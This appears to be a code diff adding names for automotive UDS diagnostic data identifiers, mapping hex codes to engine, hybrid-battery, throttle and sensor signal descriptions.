+UDS_RDBI.dataIdentifiers[0x2161] = "Crankshaft signal" +UDS_RDBI.dataIdentifiers[0x2162] = "Counter of loose of crankshaft synchronization" +UDS_RDBI.dataIdentifiers[0x2163] = "Angular position of engine" +UDS_RDBI.dataIdentifiers[0x2164] = "Long engine start request" +UDS_RDBI.dataIdentifiers[0x2165] = "TLZ High speed and fast adaptative crank shaft learning strategy finished" +UDS_RDBI.dataIdentifiers[0x2166] = "External controls safety authorization flag" +UDS_RDBI.dataIdentifiers[0x2167] = "Oil pump monitored command" +UDS_RDBI.dataIdentifiers[0x2168] = "Cumulative number of engine starts" +UDS_RDBI.dataIdentifiers[0x2169] = "Number of engine first starts or number of trips done by the vehicle" +UDS_RDBI.dataIdentifiers[0x216a] = "Cumulative number of engine starts non resettable" +UDS_RDBI.dataIdentifiers[0x216b] = "Number of engine first starts or number of trips done by the vehicle non resettable" +UDS_RDBI.dataIdentifiers[0x216c] = "Distance vehicle non resetable calculated by the ECM" +UDS_RDBI.dataIdentifiers[0x216d] = "Vehicle speed autoconfiguration" +UDS_RDBI.dataIdentifiers[0x216e] = "Autoconfiguration variable for air conditionning" +UDS_RDBI.dataIdentifiers[0x216f] = "State of EMCU Control Unit for CAN failure detection" +UDS_RDBI.dataIdentifiers[0x2170] = "CCSL State of the system causes for normal CCSL deactivation 2nd byte" +UDS_RDBI.dataIdentifiers[0x2172] = "Reference software calbration number used by tunning team VMAP" +UDS_RDBI.dataIdentifiers[0x2174] = "ACC Force request confirmed from CAN" +UDS_RDBI.dataIdentifiers[0x2175] = "ACC status from CAN" +UDS_RDBI.dataIdentifiers[0x2176] = "Vehicle acceleration state form CAN" +UDS_RDBI.dataIdentifiers[0x2177] = "Pressure Request status from ACC" +UDS_RDBI.dataIdentifiers[0x2178] = "Force request from ACC" +UDS_RDBI.dataIdentifiers[0x2179] = "Driver force setpoint" +UDS_RDBI.dataIdentifiers[0x217a] = "Confirmed failure corresponding to the checks on ACC" +UDS_RDBI.dataIdentifiers[0x217b] = "ACC steering wheel switches connection detection Stored in EEPROM" +UDS_RDBI.dataIdentifiers[0x217c] = "Detect ACC option with security on configuration detection Stored in EEPROM" +UDS_RDBI.dataIdentifiers[0x217d] = "Maximum duration of DISTANCE button press" +UDS_RDBI.dataIdentifiers[0x2180] = "2181 21A0" +UDS_RDBI.dataIdentifiers[0x2181] = "Mileage recording" +UDS_RDBI.dataIdentifiers[0x2184] = "Requested speed setpoint for FSL function" +UDS_RDBI.dataIdentifiers[0x2186] = "Idle speed for LCV accessories activation requested by BCM" +UDS_RDBI.dataIdentifiers[0x2187] = "State of the CTP cutoff" +UDS_RDBI.dataIdentifiers[0x2188] = "State of the CTP unicing" +UDS_RDBI.dataIdentifiers[0x218d] = "Final PTC level" +UDS_RDBI.dataIdentifiers[0x218e] = "PTC freeze request" +UDS_RDBI.dataIdentifiers[0x218f] = "PTC cut off request" +UDS_RDBI.dataIdentifiers[0x2190] = "Torque safety monitoring status flags for snapshot data" +UDS_RDBI.dataIdentifiers[0x2191] = "Power consumed by PTC" +UDS_RDBI.dataIdentifiers[0x2192] = "PTC cabin fan state" +UDS_RDBI.dataIdentifiers[0x2193] = "PTC Cabin fan request detection" +UDS_RDBI.dataIdentifiers[0x2195] = "PTC engine idle speed increase request" +UDS_RDBI.dataIdentifiers[0x219b] = "Maximum vehicle speed to authorize commercial vehicle accessories accelerated idle speed" +UDS_RDBI.dataIdentifiers[0x219c] = "Detection of a failure that causes commercial vehicle accessories accelerated idle speed deactivation" +UDS_RDBI.dataIdentifiers[0x21a0] = "21A1 21C0" +UDS_RDBI.dataIdentifiers[0x21a1] = "TDC decrementing counter for HBN fast adaptive process used on the first value of the main TDC counter" +UDS_RDBI.dataIdentifiers[0x21a2] = "Slow adaptive process finished" +UDS_RDBI.dataIdentifiers[0x21a3] = "Validity of the learned default value" +UDS_RDBI.dataIdentifiers[0x21a4] = "Filtered adaptive value for the first value of the TDC counter during slow adaptive process" +UDS_RDBI.dataIdentifiers[0x21a5] = "Filtered adaptive value for the first value of the TDC counter in the first speed range" +UDS_RDBI.dataIdentifiers[0x21a6] = "Filtered adaptive value for the first value of the TDC counter in the second speed range" +UDS_RDBI.dataIdentifiers[0x21a7] = "Filtered adaptive value for the first value of the TDC counter in the third speed range" +UDS_RDBI.dataIdentifiers[0x21a8] = "Filtered adaptive value for the first value of the TDC counter in the 4th speed range" +UDS_RDBI.dataIdentifiers[0x21a9] = "Filtered adaptive value for the first value of the TDC counter in the 5th speed range" +UDS_RDBI.dataIdentifiers[0x21aa] = "Filtered adaptive value for the first value of the TDC counter in the 6th speed range" +UDS_RDBI.dataIdentifiers[0x21ab] = "TDC decrementing counter for HBN fast adaptive process used on the second value of the main TDC counter" +UDS_RDBI.dataIdentifiers[0x21ac] = "Filtered adaptive value for the second value of the TDC counter during slow adaptive process" +UDS_RDBI.dataIdentifiers[0x21ad] = "Filtered adaptive value for the second value of the TDC counter in the first speed range" +UDS_RDBI.dataIdentifiers[0x21ae] = "Filtered adaptive value for the second value of the TDC counter in the second speed range" +UDS_RDBI.dataIdentifiers[0x21af] = "Filtered adaptive value for the second value of the TDC counter in the third speed range" +UDS_RDBI.dataIdentifiers[0x21b0] = "Filtered adaptive value for the second value of the TDC counter in the 4th speed range" +UDS_RDBI.dataIdentifiers[0x21b1] = "Filtered adaptive value for the second value of the TDC counter in the 5th speed range" +UDS_RDBI.dataIdentifiers[0x21b2] = "Filtered adaptive value for the second value of the TDC counter in the 6th speed range" +UDS_RDBI.dataIdentifiers[0x21b3] = "TDC decrementing counter for HBN fast adaptive process used on the third value of the main TDC counter" +UDS_RDBI.dataIdentifiers[0x21b4] = "Filtered adaptive value for the third value of the TDC counter during slow adaptive process" +UDS_RDBI.dataIdentifiers[0x21b5] = "Filtered adaptive value for the third value of the TDC counter in the first speed range" +UDS_RDBI.dataIdentifiers[0x21b6] = "Filtered adaptive value for the third value of the TDC counter in the second speed range" +UDS_RDBI.dataIdentifiers[0x21b7] = "Filtered adaptive value for the third value of the TDC counter in the third speed range" +UDS_RDBI.dataIdentifiers[0x21b8] = "Filtered adaptive value for the third value of the TDC counter in the 4th speed range" +UDS_RDBI.dataIdentifiers[0x21b9] = "Filtered adaptive value for the third value of the TDC counter in the 5th speed range" +UDS_RDBI.dataIdentifiers[0x21ba] = "Filtered adaptive value for the third value of the TDC counter in the 6th speed range" +UDS_RDBI.dataIdentifiers[0x21bb] = "Status of target adaptive process" +UDS_RDBI.dataIdentifiers[0x21bc] = "Last achieved adaptive value" +UDS_RDBI.dataIdentifiers[0x21bd] = "Default learning counter on the first value of the main TDC counter" +UDS_RDBI.dataIdentifiers[0x21be] = "Default learning counter on the second value of the main TDC counter" +UDS_RDBI.dataIdentifiers[0x21bf] = "Default learning counter on the third value of the main TDC counter" +UDS_RDBI.dataIdentifiers[0x21c0] = "21C1 21E0" +UDS_RDBI.dataIdentifiers[0x21c1] = "Learned filtered value on the first value of the main TDC counter" +UDS_RDBI.dataIdentifiers[0x21c2] = "Learned filtered value on the 2nd value of the main TDC counter" +UDS_RDBI.dataIdentifiers[0x21c3] = "Learned filtered value on the third value of the main TDC counter" +UDS_RDBI.dataIdentifiers[0x21c4] = "HBN adaptive correction" +UDS_RDBI.dataIdentifiers[0x21c5] = "Distance driven since torque meter init Write 2" +UDS_RDBI.dataIdentifiers[0x21c6] = "Maximum engine speed for misfiring detection strategy" +UDS_RDBI.dataIdentifiers[0x21c7] = "Vehicle distance at last succesfull detection test Fuel level or Vehicle distance" +UDS_RDBI.dataIdentifiers[0x21c8] = "HBN adaptive correction 01" +UDS_RDBI.dataIdentifiers[0x21cd] = "User SOC" +UDS_RDBI.dataIdentifiers[0x21ce] = "Electrical Energy Management DCDC status" +UDS_RDBI.dataIdentifiers[0x21d2] = "State of DCDC Unit for CAN failure detection" +UDS_RDBI.dataIdentifiers[0x21dd] = "Management System 2 ECU state" +UDS_RDBI.dataIdentifiers[0x21df] = "Low voltage power supply current supply by DCDC" +UDS_RDBI.dataIdentifiers[0x21e0] = "21E1 21FF" +UDS_RDBI.dataIdentifiers[0x21e6] = "Accumulated failure time for ivld management" +UDS_RDBI.dataIdentifiers[0x21e7] = "Accumulated mileage buffer in highway conditions" +UDS_RDBI.dataIdentifiers[0x21e8] = "Number of significant cases of highway conditions" +UDS_RDBI.dataIdentifiers[0x21e9] = "Average mileage between two significant cases of highway condition" +UDS_RDBI.dataIdentifiers[0x21ea] = "Cumulated mileage in highway conditions" +UDS_RDBI.dataIdentifiers[0x21eb] = "Mileage rate of highway conditions" +UDS_RDBI.dataIdentifiers[0x21ec] = "Accumulated mileage buffer in road conditions" +UDS_RDBI.dataIdentifiers[0x21ed] = "Cumulated mileage in road conditions" +UDS_RDBI.dataIdentifiers[0x21ee] = "Mileage rate of road conditions" +UDS_RDBI.dataIdentifiers[0x21ef] = "Accumulated mileage buffer in urban conditions" +UDS_RDBI.dataIdentifiers[0x21f0] = "Cumulated mileage in urban conditions" +UDS_RDBI.dataIdentifiers[0x21f1] = "Mileage rate of urban conditions" +UDS_RDBI.dataIdentifiers[0x2200] = "2201 2220" +UDS_RDBI.dataIdentifiers[0x2201] = "Kraftstoffdruck Sensorspannung ROH" +UDS_RDBI.dataIdentifiers[0x2202] = "Hebelgeber 1 Spannung ROH" +UDS_RDBI.dataIdentifiers[0x2203] = "Hebelgeber 2 Spannung ROH" +UDS_RDBI.dataIdentifiers[0x2206] = "NVLD Switch Spannung Low ROH" +UDS_RDBI.dataIdentifiers[0x2207] = "NVLD Switch Spannung High ROH" # or Motor fan failure status on the CAN +UDS_RDBI.dataIdentifiers[0x220a] = "State of Inverter Unit for CAN failure detection" +UDS_RDBI.dataIdentifiers[0x2218] = "Environmental temperature" +UDS_RDBI.dataIdentifiers[0x221a] = "State of BMS Unit for CAN failure detection" +UDS_RDBI.dataIdentifiers[0x221e] = "Emergency engine stop request" +UDS_RDBI.dataIdentifiers[0x2220] = "2221 2240" +UDS_RDBI.dataIdentifiers[0x2221] = "Brake pedal states validity indicator is in the limp home data status" +UDS_RDBI.dataIdentifiers[0x2222] = "Filtered unavailable clutch pedal status information" +UDS_RDBI.dataIdentifiers[0x2223] = "Engine control request for cruise control abnormal deactivation" +UDS_RDBI.dataIdentifiers[0x2224] = "Engine control request for cruise control system deactivation" +UDS_RDBI.dataIdentifiers[0x2225] = "Vehicle speed received on the CAN network not available after a filtering time" +UDS_RDBI.dataIdentifiers[0x2226] = "Displayed vehicle speed received on the CAN network not available after a filtering time" +UDS_RDBI.dataIdentifiers[0x2227] = "Engine control request for speed limiter abnormal deactivation" +UDS_RDBI.dataIdentifiers[0x2228] = "Engine control request for speed limiter system deactivation" +UDS_RDBI.dataIdentifiers[0x2229] = "Air conditioning request detection" +UDS_RDBI.dataIdentifiers[0x222a] = "Relative air conditioning pressure" +UDS_RDBI.dataIdentifiers[0x222b] = "Automatic or manual parking brake detected" +UDS_RDBI.dataIdentifiers[0x222c] = "Begin stroke clutch pedal switch for cruise control safety" +UDS_RDBI.dataIdentifiers[0x222d] = "Begin stroke clutch pedal switch for cruise control" +UDS_RDBI.dataIdentifiers[0x222e] = "Neutral engaged switch for manual gearbox" +UDS_RDBI.dataIdentifiers[0x222f] = "Authorization to connect cruise control and speed limiter options" +UDS_RDBI.dataIdentifiers[0x2230] = "Boolean to allow increment of Vxx clu stal ctr" +UDS_RDBI.dataIdentifiers[0x2231] = "Counter of stalling of type clutch failed starting up due to the software lock" +UDS_RDBI.dataIdentifiers[0x2232] = "Counter of success of cylinder recognition in idle speed regulation" +UDS_RDBI.dataIdentifiers[0x2233] = "Counter of confirmation of phase in using cylinder recognition running vehicule" +UDS_RDBI.dataIdentifiers[0x2234] = "Failure counter for cylinder recognition" +UDS_RDBI.dataIdentifiers[0x2235] = "Cylinder recognition counter" +UDS_RDBI.dataIdentifiers[0x2236] = "Cylinder recognition counter in idle speed regulation" +UDS_RDBI.dataIdentifiers[0x2237] = "Failure counter for idle speed speed regulation not confirmed by cylinder recognition for running vehicle" +UDS_RDBI.dataIdentifiers[0x2238] = "Counter of success od cylinder recognition in idle speed regulation" +UDS_RDBI.dataIdentifiers[0x2239] = "Counter of no decision of cylinder recognition" +UDS_RDBI.dataIdentifiers[0x223a] = "Counter of no decision of cylinder recognition in RR mode" +UDS_RDBI.dataIdentifiers[0x223b] = "Rephasing counter after cylinder recognition in running vehicle" +UDS_RDBI.dataIdentifiers[0x223e] = "Consolidated braking pressure" +UDS_RDBI.dataIdentifiers[0x2240] = "2241 2260" +UDS_RDBI.dataIdentifiers[0x2241] = "Allow comparison between measured angular positions of the camshaft wheel active edges and values stored in EEPROM Rea" +UDS_RDBI.dataIdentifiers[0x2242] = "Angular position stored in EEPROM for the active edge n 0 camshatf wheel" +UDS_RDBI.dataIdentifiers[0x2243] = "Angular position stored in EEPROM for the active edge n 1 camshatf wheel" +UDS_RDBI.dataIdentifiers[0x2244] = "Angular position stored in EEPROM for the active edge n 2 camshatf wheel" +UDS_RDBI.dataIdentifiers[0x2245] = "Angular position stored in EEPROM for the active edge n 3 camshatf wheel" +UDS_RDBI.dataIdentifiers[0x2246] = "Integral torque correction Idle Speed regulator" +UDS_RDBI.dataIdentifiers[0x2247] = "Oscillation detected failure local counter for inlet throttle" +UDS_RDBI.dataIdentifiers[0x2248] = "Immobilizer 2 Failure of coded line" +UDS_RDBI.dataIdentifiers[0x2249] = "Immobilizer 2 ECM is locked" +UDS_RDBI.dataIdentifiers[0x224a] = "Immobilizer 2 ECM is protected" +UDS_RDBI.dataIdentifiers[0x224b] = "Immobilizer 2 Failure of EEPROM area" +UDS_RDBI.dataIdentifiers[0x224c] = "Immobilizer 2 Secret key learnt" +UDS_RDBI.dataIdentifiers[0x224d] = "PWM control applied to the driver of the exhaust VVTC solenoid valve" +UDS_RDBI.dataIdentifiers[0x224e] = "Angular position of the exhaust VVTC system" +UDS_RDBI.dataIdentifiers[0x224f] = "Angular position setpoint of the exhaust VVTC system" +UDS_RDBI.dataIdentifiers[0x2255] = "Filtered angular position of the exhaust VVTC system" +UDS_RDBI.dataIdentifiers[0x2260] = "2261 2280" +UDS_RDBI.dataIdentifiers[0x2261] = "Power steering manostat activation" +UDS_RDBI.dataIdentifiers[0x2262] = "Activation request solenoid valve of additional fuel tank" +UDS_RDBI.dataIdentifiers[0x2263] = "Activation request pump of additional fuel tank" +UDS_RDBI.dataIdentifiers[0x2264] = "Flow water valve command of water system" +UDS_RDBI.dataIdentifiers[0x2280] = "2281 22A0" +UDS_RDBI.dataIdentifiers[0x2281] = "oil soot rate for oil wear estimation" +UDS_RDBI.dataIdentifiers[0x2282] = "Interpolation raw factor from oil dilution to oil soot" +UDS_RDBI.dataIdentifiers[0x2287] = "Rounded oil soot potential meters" +UDS_RDBI.dataIdentifiers[0x228c] = "Vehicle kilometer when the alert appears" +UDS_RDBI.dataIdentifiers[0x228d] = "Total vehicle distance when the oil soot becomes to high stored on EEPROM" +UDS_RDBI.dataIdentifiers[0x228e] = "Oil potential kilometers during one by one km decrementation" +UDS_RDBI.dataIdentifiers[0x228f] = "Type of initialisation when the state of the counter is 0" +UDS_RDBI.dataIdentifiers[0x2290] = "Type of initialisation when the state of the counter is" +UDS_RDBI.dataIdentifiers[0x2291] = "Type of initialisation when the state of the counter is 2" +UDS_RDBI.dataIdentifiers[0x2292] = "Type of initialisation when the state of the counter is 3" +UDS_RDBI.dataIdentifiers[0x2293] = "normal mode oil dilution rate" +UDS_RDBI.dataIdentifiers[0x2294] = "raw oil dilution rate" +UDS_RDBI.dataIdentifiers[0x2295] = "Interval time in full load mode" +UDS_RDBI.dataIdentifiers[0x2296] = "Interval time between two regenerations" +UDS_RDBI.dataIdentifiers[0x2298] = "Oil potential kilometers calculated" +UDS_RDBI.dataIdentifiers[0x2299] = "Calculated oil potential in kilometers can be negative" +UDS_RDBI.dataIdentifiers[0x22a0] = "22A1 22C0" +UDS_RDBI.dataIdentifiers[0x22a9] = "SCR Control Unit DCU counter for validated CAN failure detection" +UDS_RDBI.dataIdentifiers[0x22aa] = "Cumulative number of engine starts for starter reliability" +UDS_RDBI.dataIdentifiers[0x22ac] = "Cause of the failsafe reaction triggered by level 2 monitoring" +UDS_RDBI.dataIdentifiers[0x22ad] = "First context data for level 2 monitoring function failure" +UDS_RDBI.dataIdentifiers[0x22ae] = "Second context data for level 2 monitoring function failure" +UDS_RDBI.dataIdentifiers[0x22af] = "Third context data for level 2 monitoring function failure" +UDS_RDBI.dataIdentifiers[0x22b0] = "Fourth context data for level 2 monitoring function failure" +UDS_RDBI.dataIdentifiers[0x22b6] = "Wire begin clutch contactor state" +UDS_RDBI.dataIdentifiers[0x22b8] = "Anticipated coupler state" +UDS_RDBI.dataIdentifiers[0x22bc] = "Dynamic mode request received on the CAN" +UDS_RDBI.dataIdentifiers[0x22bd] = "Eco mode request received on the CAN" +UDS_RDBI.dataIdentifiers[0x22be] = "Drive mode received on the CAN" +UDS_RDBI.dataIdentifiers[0x22bf] = "Power supply voltage raw acquisition of cylinder pressure sensor" +UDS_RDBI.dataIdentifiers[0x2400] = "2401 2420" +UDS_RDBI.dataIdentifiers[0x2401] = "Boost pressure" +UDS_RDBI.dataIdentifiers[0x2402] = "Boost pressure setpoint" +UDS_RDBI.dataIdentifiers[0x2406] = "Inlet throttle PWM command" +UDS_RDBI.dataIdentifiers[0x240b] = "Intake manifold pressure" +UDS_RDBI.dataIdentifiers[0x240d] = "Intake air temperature" +UDS_RDBI.dataIdentifiers[0x2411] = "State Of Charge" +UDS_RDBI.dataIdentifiers[0x2414] = "Throttle valve position setpoint" +UDS_RDBI.dataIdentifiers[0x2415] = "Throttle valve position track" +UDS_RDBI.dataIdentifiers[0x2416] = "Maximum Hybrid Battery Module Temperature" +UDS_RDBI.dataIdentifiers[0x2417] = "Minimum Hybrid Battery Module Temperature" +UDS_RDBI.dataIdentifiers[0x2418] = "Throttle valve position sensor voltage track" +UDS_RDBI.dataIdentifiers[0x2419] = "Throttle valve position sensor voltage track" +UDS_RDBI.dataIdentifiers[0x2420] = "2421 2440" +UDS_RDBI.dataIdentifiers[0x2422] = "Amount of air pumped into cylinder" +UDS_RDBI.dataIdentifiers[0x2426] = "Regenerative Braking Axle Torque Request" +UDS_RDBI.dataIdentifiers[0x2427] = "Engine Torque Actual" +UDS_RDBI.dataIdentifiers[0x2428] = "Commanded Axle Torque Predicted" +UDS_RDBI.dataIdentifiers[0x2429] = "Axle Torque Actual" +UDS_RDBI.dataIdentifiers[0x242a] = "Strong Hybrid Limp-Home" +UDS_RDBI.dataIdentifiers[0x242b] = "Estimated Regenerative Braking Axle Torque" +UDS_RDBI.dataIdentifiers[0x242c] = "Driver Intended Total Brake Torque" +UDS_RDBI.dataIdentifiers[0x242d] = "Commanded Axle Torque Immediate" +UDS_RDBI.dataIdentifiers[0x242e] = "Internal Combustion Engine" +UDS_RDBI.dataIdentifiers[0x242f] = "MCPA Motor B Current Offset Phase A" # or MCPB Motor A Current Offset Phase " # or Throttle valve position +UDS_RDBI.dataIdentifiers[0x2430] = "MCPB Motor A Current Offset Phase B" # or MCPA Motor B Current Offset Phase " +UDS_RDBI.dataIdentifiers[0x2431] = "MCPB Motor A Current Offset Phase C" # or MCPA Motor B Current Offset Phase " +UDS_RDBI.dataIdentifiers[0x2432] = "Engine Crank Speed Commanded" +UDS_RDBI.dataIdentifiers[0x2433] = "Internal Combustion Engine Cranking" +UDS_RDBI.dataIdentifiers[0x2434] = "Driver Intended Axle Torque" +UDS_RDBI.dataIdentifiers[0x2435] = "BSE x EE NV Data.EE OldEE09" +UDS_RDBI.dataIdentifiers[0x2436] = "kWhr Round Trip" +UDS_RDBI.dataIdentifiers[0x2437] = "Commanded Predicted Engine Torque" +UDS_RDBI.dataIdentifiers[0x2438] = "Commanded Immediate Engine Torque" +UDS_RDBI.dataIdentifiers[0x2439] = "BSE x EE NV Data.EE OldEE07" +UDS_RDBI.dataIdentifiers[0x243f] = "Intake manifold temperature" +UDS_RDBI.dataIdentifiers[0x2440] = "2441 2460" # or VeBSEC k BSEinitState +UDS_RDBI.dataIdentifiers[0x2441] = "Ahr Charge" +UDS_RDBI.dataIdentifiers[0x2442] = "Ahr DisCharge" +UDS_RDBI.dataIdentifiers[0x2443] = "VeAPIC Output1" +UDS_RDBI.dataIdentifiers[0x2445] = "VeAPIC Output12" +UDS_RDBI.dataIdentifiers[0x2446] = "VeAPIC Output4 " +UDS_RDBI.dataIdentifiers[0x2447] = "VeAPIC Output5" +UDS_RDBI.dataIdentifiers[0x2448] = "VeAPIC Output6 " # or Pressure before turbine +UDS_RDBI.dataIdentifiers[0x2449] = "VeAPIC Output13" # or Catalyst exhaust gas upstream oxygen sensor voltage +UDS_RDBI.dataIdentifiers[0x244a] = "Catalyst exhaust gas downstream oxygen sensor voltage" +UDS_RDBI.dataIdentifiers[0x244b] = "Catalyst exhaust gas upstream oxygen resistance heater PWM command" +UDS_RDBI.dataIdentifiers[0x244c] = "Catalyst exhaust gas downstream oxygen resistance heater PWM command" +UDS_RDBI.dataIdentifiers[0x244d] = "Inlet throttle upstream temperature" +UDS_RDBI.dataIdentifiers[0x2450] = "VeAPIC Output9" +UDS_RDBI.dataIdentifiers[0x2451] = "b contactor command" +UDS_RDBI.dataIdentifiers[0x2452] = "b HS Comm" +UDS_RDBI.dataIdentifiers[0x2453] = "b Proper Shutdown" +UDS_RDBI.dataIdentifiers[0x2454] = "BSE x EE NV Data.EE OldEE01" +UDS_RDBI.dataIdentifiers[0x2455] = "BSE x EE NV Data.EE OldEE02" +UDS_RDBI.dataIdentifiers[0x2456] = "BSE x EE NV Data.EE OldEE03" +UDS_RDBI.dataIdentifiers[0x2457] = "BSE x EE NV Data.EE OldEE04" +UDS_RDBI.dataIdentifiers[0x2458] = "BSE x EE NV Data.EE OldEE05" # or Throttle valve offset min position track 2 +UDS_RDBI.dataIdentifiers[0x2459] = "BSE x EE NV Data.EE OldEE06" +UDS_RDBI.dataIdentifiers[0x245a] = "Throttle valve offset limp home position track 2" +UDS_RDBI.dataIdentifiers[0x245b] = "Throttle valve offset max position track" +UDS_RDBI.dataIdentifiers[0x245c] = "Throttle valve offset max position track 2" +UDS_RDBI.dataIdentifiers[0x245d] = "Throttle valve offset first learnings successfully done" +UDS_RDBI.dataIdentifiers[0x245e] = "Engine air load" +UDS_RDBI.dataIdentifiers[0x2460] = "BSE x EE NV Data.EE Pct OldPackSOC" # or 2461 2480 +UDS_RDBI.dataIdentifiers[0x2461] = "BSE x EE NV Data.EE Pct OldSOCAcc" +UDS_RDBI.dataIdentifiers[0x2462] = "BSE x EE NV Data.EE Pct SOH" +UDS_RDBI.dataIdentifiers[0x2463] = "EE BatODO" +UDS_RDBI.dataIdentifiers[0x2464] = "VeAPIC Output10 " +UDS_RDBI.dataIdentifiers[0x2465] = "BSE x EE NV Data.EE T TOld " +UDS_RDBI.dataIdentifiers[0x2466] = "BSE x EE NV Data.EE U OldVo" +UDS_RDBI.dataIdentifiers[0x2467] = "CntCtrStat" +UDS_RDBI.dataIdentifiers[0x2468] = "I Current " +UDS_RDBI.dataIdentifiers[0x2469] = "init OCV" +UDS_RDBI.dataIdentifiers[0x246f] = "Throttle valve voltage command" +UDS_RDBI.dataIdentifiers[0x2470] = "init pack current" +UDS_RDBI.dataIdentifiers[0x2471] = "NumOfModules" +UDS_RDBI.dataIdentifiers[0x2472] = "T Temperature" +UDS_RDBI.dataIdentifiers[0x2473] = "U MaxModVoltage" +UDS_RDBI.dataIdentifiers[0x2474] = "U MinModVoltage" +UDS_RDBI.dataIdentifiers[0x2475] = "U Voltage" +UDS_RDBI.dataIdentifiers[0x2476] = "VeAPIC b SOCreset anz" +UDS_RDBI.dataIdentifiers[0x2477] = "VeAPIC Output14" +UDS_RDBI.dataIdentifiers[0x2478] = "VeAPIC Output15" +UDS_RDBI.dataIdentifiers[0x2479] = "VeAPIC Output20" +UDS_RDBI.dataIdentifiers[0x2480] = "2481 24A0" # or VeAPIC Output16 +UDS_RDBI.dataIdentifiers[0x2481] = "VeAPIC Output17" +UDS_RDBI.dataIdentifiers[0x2482] = "VeAPIC Output18" +UDS_RDBI.dataIdentifiers[0x2483] = "VeAPIC Output19" +UDS_RDBI.dataIdentifiers[0x2484] = "VeAPIC Output7" +UDS_RDBI.dataIdentifiers[0x2485] = "VeAPIC Output8" +UDS_RDBI.dataIdentifiers[0x2489] = "Oil dilution rate" +UDS_RDBI.dataIdentifiers[0x2491] = "VeAPIC Pct HB SOCahr" +UDS_RDBI.dataIdentifiers[0x2492] = "VeAPIC Pct HB SOCvolt" +UDS_RDBI.dataIdentifiers[0x2493] = "VeAPIC t BSEofftime" # or Result of the catalyst diagnostic after sales routine +UDS_RDBI.dataIdentifiers[0x2494] = "VeAPIC b BSEofftimeVld" # or Result of the catalyst exhaust gas upstream oxygen sensor diagnostic after sales routine +UDS_RDBI.dataIdentifiers[0x2495] = "MAZ neu" +UDS_RDBI.dataIdentifiers[0x2496] = "MAZ neuVld" +UDS_RDBI.dataIdentifiers[0x2497] = "Timestamp" +UDS_RDBI.dataIdentifiers[0x2498] = "Timestamp valid" +UDS_RDBI.dataIdentifiers[0x24a0] = "24A0 24C0" +UDS_RDBI.dataIdentifiers[0x24bf] = "Turbo water cooling pump command" +UDS_RDBI.dataIdentifiers[0x24c0] = "24C1 24E0" +UDS_RDBI.dataIdentifiers[0x24c1] = "Time expected to switch on the heating of the downstream sensor" +UDS_RDBI.dataIdentifiers[0x24c3] = "Slow adaptative term of the wastegate control" +UDS_RDBI.dataIdentifiers[0x24c4] = "Time expected to switch on the heating of the upstream sensor" +UDS_RDBI.dataIdentifiers[0x24c5] = "Variable table for throttle area curve" +UDS_RDBI.dataIdentifiers[0x24c9] = "Limp home position of the inlet throttle" +UDS_RDBI.dataIdentifiers[0x24d7] = "Manifold pressure value from model" +UDS_RDBI.dataIdentifiers[0x24dd] = "Variable table for throttle area curve 01" +UDS_RDBI.dataIdentifiers[0x24e0] = "24E1 24FF" +UDS_RDBI.dataIdentifiers[0x24e1] = "Manifold pressure from sensor" +UDS_RDBI.dataIdentifiers[0x24e5] = "Boost pressure PWM command gasoline" +UDS_RDBI.dataIdentifiers[0x2500] = "2501 2520" +UDS_RDBI.dataIdentifiers[0x2501] = "End of the first learning phase after first key on" +UDS_RDBI.dataIdentifiers[0x2502] = "Offset Deviation detected failure local counter" +UDS_RDBI.dataIdentifiers[0x2503] = "Request to relearn on next power latch phase" +UDS_RDBI.dataIdentifiers[0x2504] = "Springs check detected failure local counter" +UDS_RDBI.dataIdentifiers[0x2505] = "First Offset detected failure local counter" +UDS_RDBI.dataIdentifiers[0x2506] = "Progress in the heater strategy" +UDS_RDBI.dataIdentifiers[0x2507] = "Heater strategy indicator" +UDS_RDBI.dataIdentifiers[0x2514] = "PWM value for the sensor heater" +UDS_RDBI.dataIdentifiers[0x2515] = "Sensor internal temperature" +UDS_RDBI.dataIdentifiers[0x2516] = "Counter of correction application since beginning engine life or since after sale resetting" +UDS_RDBI.dataIdentifiers[0x2517] = "Correction curve for computing PCtl corrected by ATOL" +UDS_RDBI.dataIdentifiers[0x2518] = "Vector counter of learning points indexed by RCO" +UDS_RDBI.dataIdentifiers[0x2519] = "Exhaust gaz oxygen concentration" +UDS_RDBI.dataIdentifiers[0x251a] = "Upstream lambda sensor is heated" +UDS_RDBI.dataIdentifiers[0x251b] = "Mean value of internal upstream proportional sensor temperature in a window" +UDS_RDBI.dataIdentifiers[0x251d] = "Internal sensor temperature" +UDS_RDBI.dataIdentifiers[0x251e] = "Raw UEGO Air Fuel ratio measurement" +UDS_RDBI.dataIdentifiers[0x251f] = "Vehicle speed threshold detected" +UDS_RDBI.dataIdentifiers[0x2520] = "2540 2560" +UDS_RDBI.dataIdentifiers[0x2524] = "Pwm command for inlet throttle" +UDS_RDBI.dataIdentifiers[0x2529] = "Positive deviation diagnostic criteria" +UDS_RDBI.dataIdentifiers[0x252a] = "Negative deviation diagnostic criteria" +UDS_RDBI.dataIdentifiers[0x252d] = "Flag indicating a frozen signal from the exhaust manifold pressure sensor" +UDS_RDBI.dataIdentifiers[0x252f] = "Logic indicating if offset learning has done at least once" +UDS_RDBI.dataIdentifiers[0x2532] = "Turbocharger Compressor ByPass Valve command status" +UDS_RDBI.dataIdentifiers[0x2533] = "Command of manifold pressure calculated by the torque structure" +UDS_RDBI.dataIdentifiers[0x2536] = "First value of closed thrust position of the inlet throttle" +UDS_RDBI.dataIdentifiers[0x253d] = "Corrected tyre circumference" +UDS_RDBI.dataIdentifiers[0x253e] = "Displayed vehicle speed factor" +UDS_RDBI.dataIdentifiers[0x253f] = "Displayed vehicle speed offset" +UDS_RDBI.dataIdentifiers[0x2540] = "2521 2540" +UDS_RDBI.dataIdentifiers[0x2550] = "Radiator Valve" +UDS_RDBI.dataIdentifiers[0x2551] = "Chiller Valve" +UDS_RDBI.dataIdentifiers[0x2560] = "2561 2580" +UDS_RDBI.dataIdentifiers[0x2573] = "Double loop offset" +UDS_RDBI.dataIdentifiers[0x2580] = "2581 25A0" +UDS_RDBI.dataIdentifiers[0x25a0] = "25A1 25C0" +UDS_RDBI.dataIdentifiers[0x25b1] = "Absolute time since the first ignition" +UDS_RDBI.dataIdentifiers[0x25b2] = "Drive mode switch status detection" +UDS_RDBI.dataIdentifiers[0x25b9] = "Oil pressure mesured" +UDS_RDBI.dataIdentifiers[0x25bc] = "Max blow by counter value of last start" +UDS_RDBI.dataIdentifiers[0x25bd] = "Road slope value" +UDS_RDBI.dataIdentifiers[0x25c0] = "25C1 25E0" +UDS_RDBI.dataIdentifiers[0x25c1] = "Voltage setpoint given to the H bridge" 